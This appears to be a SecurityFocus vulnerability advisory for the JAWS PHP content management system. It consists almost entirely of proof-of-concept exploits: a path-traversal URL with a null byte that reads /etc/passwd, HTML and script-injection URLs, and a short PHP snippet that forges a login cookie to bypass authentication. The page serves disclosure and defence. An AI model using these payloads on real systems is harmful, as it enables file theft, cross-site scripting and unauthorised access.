Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

JAWS Multiple Input Validation Vulnerabilities

The following examples are available:
http://www.example.com/jaws/index.php?gadget=../../../../../../../../../../etc/passwd%00&path=/etc
http://www.example.com/jaws/index.php?gadget=[a valid gadget]&action=<b>bold letter</b>
http://www.example.com/jaws/index.php?gadget=[a valid gadget]&action=<script>alert('Colombia Rulx!!');</script>

//BEGIN

//exploit.php
<?PHP
setcookie("logged","d41d8cd98f00b204e9800998ecf8427e",time()+86400*365,'path
to jaws');
?>

//END







 

Privacy Statement
Copyright 2009, SecurityFocus